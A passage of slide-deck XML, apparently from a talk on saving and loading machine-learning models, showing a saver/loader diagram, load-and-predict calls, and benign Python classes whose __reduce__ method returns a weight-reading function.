              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Google Shape;685;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="686" name="Google Shape;686;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="687" name="Google Shape;687;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Google Shape;688;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Google Shape;689;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="690" name="Google Shape;690;p58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="691" name="Google Shape;691;p58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3445200" y="2562150"/>
            <a:ext cx="1999200" cy="719700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="2604525"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Q: Should a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> need to import these callables?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100550" y="1603450"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
